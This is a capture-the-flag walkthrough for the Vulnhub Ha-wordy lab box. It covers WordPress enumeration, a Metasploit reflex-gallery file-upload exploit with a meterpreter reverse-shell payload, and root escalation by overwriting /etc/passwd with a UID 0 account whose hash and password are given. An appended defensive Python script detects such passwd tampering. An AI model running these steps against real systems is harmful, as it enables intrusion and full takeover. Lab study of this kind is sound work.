Vulnhub Ha-wordy Walkthrough

Scan the box with nmap -A -T4 -p- 192.168.1.10 -vv

Now we scan it with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt

As we can see, the box is running a WordPress service, so we are going to scan it with wpscan --url http://192.168.1.10/wordpress -e

Running the command again with plugin enumeration returned:

One of the plugins, reflex-gallery, has an exploit we can use in Metasploit; searching for reflex-gallery finds the module:

use exploit/unix/webapp/wp_reflexgallery_file_upload

set TARGETURI /wordpress

set payload php/meterpreter/reverse_tcp

cd /home/raj and cat the flag

Next we run the LinEnum.sh script, and it returned:

As we can see, we can use the cp command, so we are going to copy our passwd file to the box and replace the box's passwd file with it so we can become root.

We can create a new user on our machine with root privileges to become root.

Now add the user and hash at the end of the passwd file and copy it to your home folder

hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash

Now that we've created a new user hacker, we are going to copy our passwd file to the target box using python -m SimpleHTTPServer 80:

Now just type su hacker, then the password 123456, and you are root.
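
The passwd replacement above leaves two marks a defender can check for: a UID 0 account other than root, and a password hash stored in the passwd file itself instead of in shadow. The following is an added example, not part of the original walkthrough, that parses passwd content and reports both; the sample file, the function names and the finding labels are assumptions made for illustration.

```python
import sys

# Password-field values that mean "no hash stored here" (shadowed or locked).
NO_INLINE_HASH = {"x", "*", "!", "!!"}
# crypt(3) scheme identifiers, taken from the $id$ prefix of a hash.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

# Constructed sample: a normal passwd file plus an appended line with the same
# shape as the walkthrough's entry (the hash value here is a placeholder).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
raj:x:1000:1000:raj:/home/raj:/bin/bash
hacker:$1$salt$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
truncated:x:1001
"""

def hash_scheme(pw_field):
    """Name the crypt(3) scheme of an inline hash from its $id$ prefix."""
    if pw_field.startswith("$") and pw_field.count("$") >= 2:
        return CRYPT_IDS.get(pw_field.split("$")[1], "unknown")
    return "legacy-or-unknown"

def audit_passwd(text):
    """Return (line_no, account, finding) tuples for suspicious passwd entries."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((line_no, fields[0], "malformed"))
            continue
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if uid == 0 and name != "root":
            findings.append((line_no, name, "uid0"))  # second superuser account
        if pw == "":
            findings.append((line_no, name, "empty-password"))
        elif pw not in NO_INLINE_HASH:
            findings.append((line_no, name, "inline-hash:" + hash_scheme(pw)))
    return findings

if __name__ == "__main__":
    # With a path argument, audit that file; otherwise audit the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for line_no, name, finding in audit_passwd(text):
        print(f"line {line_no}: {name}: {finding}")
```

Run against /etc/passwd on a schedule or from file-integrity monitoring, any finding on a host that uses shadow passwords is worth an alert.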
